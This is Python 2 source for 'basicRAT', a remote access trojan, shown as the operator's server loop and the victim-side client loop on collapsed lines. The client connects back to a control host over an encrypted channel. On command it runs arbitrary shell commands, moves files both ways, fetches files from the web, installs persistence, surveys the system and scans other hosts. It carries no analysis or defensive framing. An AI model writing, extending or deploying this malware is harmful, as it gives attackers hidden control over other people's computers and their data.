def main(): parser = get_parser() args = vars(parser.parse_args()) port = args['port'] s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.bind(('0.0.0.0', port)) except socket.error: print 'Error: Unable to start server, port {} in use?'.format(port) sys.exit(1) for line in BANNER.split('\n'): time.sleep(0.05) print line print 'basicRAT server listening on port {}...'.format(port) s.listen(10) conn, addr = s.accept() DHKEY = diffiehellman(conn, server=True) while True: prompt = raw_input('\n[{}] basicRAT> '.format(addr[0])).rstrip() # allow noop if not prompt: continue # seperate prompt into command and action cmd, _, action = prompt.partition(' ') # ensure command is valid before sending if cmd not in COMMANDS: print 'Invalid command, type "help" to see a list of commands.' continue # display help text if cmd == 'help': print HELP_TEXT continue # send data to client conn.send(AES_encrypt(prompt, DHKEY)) # stop server if cmd == 'quit': s.close() sys.exit(0) # results of command elif cmd == 'run': recv_data = conn.recv(4096) print AES_decrypt(recv_data, DHKEY).rstrip() # download a file elif cmd == 'download': for fname in action.split(): fname = fname.strip() recvfile(conn, fname, DHKEY) # send file elif cmd == 'upload': for fname in action.split(): fname = fname.strip() sendfile(conn, fname, DHKEY) # regenerate DH key elif cmd == 'rekey': DHKEY = diffiehellman(conn, server=True) # results of survey, persistence, unzip, or wget elif cmd in ['scan', 'survey', 'persistence', 'unzip', 'wget']: print 'Running {}...'.format(cmd) recv_data = conn.recv(1024) print AES_decrypt(recv_data, DHKEY)
def main(): s = socket.socket() s.connect((HOST, PORT)) DHKEY = diffiehellman(s) while True: data = s.recv(1024) data = AES_decrypt(data, DHKEY) cmd, _, action = data.partition(' ') # seperate prompt into command and action # stop client if cmd == 'quit': s.close() sys.exit(0) # run command elif cmd == 'run': results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() s.sendall(AES_encrypt(results, DHKEY)) # send file elif cmd == 'download': for fname in action.split(): fname = fname.strip() sendfile(s, fname, DHKEY) # receive file elif cmd == 'upload': for fname in action.split(): fname = fname.strip() recvfile(s, fname, DHKEY) # regenerate DH key elif cmd == 'rekey': DHKEY = diffiehellman(s) # apply persistence mechanism elif cmd == 'persistence': results = run(PLAT_TYPE) s.send(AES_encrypt(results, DHKEY)) # download a file from the web elif cmd == 'wget': results = wget(action) s.send(AES_encrypt(results, DHKEY)) # unzip a file elif cmd == 'unzip': results = unzip(action) s.send(AES_encrypt(results, DHKEY)) # run system survey elif cmd == 'survey': results = run(PLAT_TYPE) s.send(AES_encrypt(results, DHKEY)) # run a scan elif cmd == 'scan': results = single_host(action) s.send(AES_encrypt(results, DHKEY))